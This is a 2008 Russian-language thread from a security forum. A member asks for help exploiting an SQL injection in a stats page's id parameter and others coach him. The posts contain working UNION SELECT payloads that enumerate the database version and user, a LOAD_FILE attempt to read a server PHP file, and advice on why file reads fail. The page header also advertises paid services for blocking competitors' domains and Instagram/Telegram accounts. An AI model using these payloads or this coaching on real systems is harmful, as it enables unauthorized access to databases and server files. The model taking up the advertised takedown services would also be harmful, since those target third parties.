УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
!! My Sql Нужен совет

Опции темы

Поиск в этой теме

Опции просмотра

!! My Sql Нужен совет

15.04.2008, 06:44

KIR@PRO

Постоянный

Регистрация: 26.12.2007

Сообщений: 353

Провел на форуме:
905389

Репутация: 332

Отправить сообщение для KIR@PRO с помощью ICQ

!! My Sql Нужен совет

Скажите я могу читать или писать файлы на сервере MYSql 4 ветки:

http://192.168.2.100/stats/map.php?id=1+and+substring(version(),1,1)=4
выполняется

http://192.168.2.100/stats/map.php?id=1+limit+5+union+select+1,2,3,4,5,6,7,8, 9,10,11,concat(version(),"%20",database(),"%20",SE SSION_USER()),13,14,15,16,17/*
как читать писать в файл зная дирикторию... но к сожелению не знаю права на папки.... и можноли тут изменять таблицу

Есть ли что то типа database() но выводящее где база находится я имею ввиду IP....

еще вот такая ситуация :
подобрал столбцы 12 столбец выводится как текст:

Код:

http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

а вот это выводит без ошибок но там где выводится 12 столбец пусто....

Код:

http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,LOAD_FILE('/var/www/html/stats/includes/class_db.php'),13,14,15,16,17/*

так же заместо loadfile вставляю CASE+WHEN+(1=1)+THEN+'A'+ELSE+'B'+END работает выводит А

привожу дополнительные сведения о SQL:
версия sql 4.0.20
Имя юзера gamecs@localhost
имя базы ps_stats
как я понял из session_user то запросы выполняются под gamecs@localhost жду помощи от знающих людей... +++

15.04.2008, 10:55

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

так в чем собсно вопрос? если есть доступ к mysql.user то можешь проверить точно, если нет а ты все таки уверен что он должен быть - проверь, выводится ли именно строковая, а не числовая инфа ( любого содержания ) ..

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

15.04.2008, 11:23

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Цитата:

Сообщение от KIR@PRO

Есть ли что то типа database() но выводящее где база находится я имею ввиду IP....

собственно функция user() после @ возвращает ip адрес сервера или доменное имя к которому текущий пользователь подключен, в твоем случае к localhost

Цитата:

Сообщение от KIR@PRO

Код:

http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,LOAD_FILE('/var/www/html/stats/includes/class_db.php'),13,14,15,16,17/*

Ну тут разные варианты, или у текущего пользователя нет файловых привилегий или по каким то причинам файл не читается (ограничены права доступа или файла нет) и еще вариант это посмотреть исходник страницы файл мог быть прочитан, но в браузере из-за тегов не отобразиться

__________________
Карфаген должен быть разрушен...

15.04.2008, 15:55

KIR@PRO

Постоянный

Регистрация: 26.12.2007

Сообщений: 353

Провел на форуме:
905389

Репутация: 332

а вот такое как можно использовать???:

Код:

Unable to update the File Comment.

DEBUG MODE

SQL Error : 1054 Unknown column 's1' in 'where clause'

UPDATE phpbb_attachments_desc SET comment = '' WHERE attach_id = -s1

Line : 750
File : posting_attachments.php

15.04.2008, 16:12

zythar

Moderator - Level 7

Регистрация: 16.02.2008

Сообщений: 580

Провел на форуме:
1595333

Репутация: 291

Отправить сообщение для zythar с помощью ICQ

омг

ты хоть понимаешь что тут написано?
тут написано:

Цитата:

не могу обновить коментарий файла.
еррор 1041. неизвестное поле 's1' в 'where clause'

тут сам запрос
UPDATE phpbb_attachments_desc SET comment = '' WHERE attach_id = -s1

файл posting_attachments.php
линия 750

как по твоему можно использовать вывод ошибок, а?

15.04.2008, 16:17

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Цитата:

Сообщение от zythar

омг

ты хоть понимаешь что тут написано?
тут написано:

как по твоему можно использовать вывод ошибок, а?

ну... ты фигню говоришь, просто походу KIR@PRO использовал в запросе текстовое значение, хотя на самом деле нужно использовать числовое

__________________
Карфаген должен быть разрушен...

15.04.2008, 16:22

zythar

Moderator - Level 7

Регистрация: 16.02.2008

Сообщений: 580

Провел на форуме:
1595333

Репутация: 291

мде... гыг.. тупанул. сорри (*

15.04.2008, 17:43

KIR@PRO

Постоянный

Регистрация: 26.12.2007

Сообщений: 353

Провел на форуме:
905389

Репутация: 332

да там после WHERE идет числовой параметр attach_id который был равен -1 а я поставил м/у - и 1 s и получилось attach_id = -s1

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая	k00p3r	Чужие Статьи	1	12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход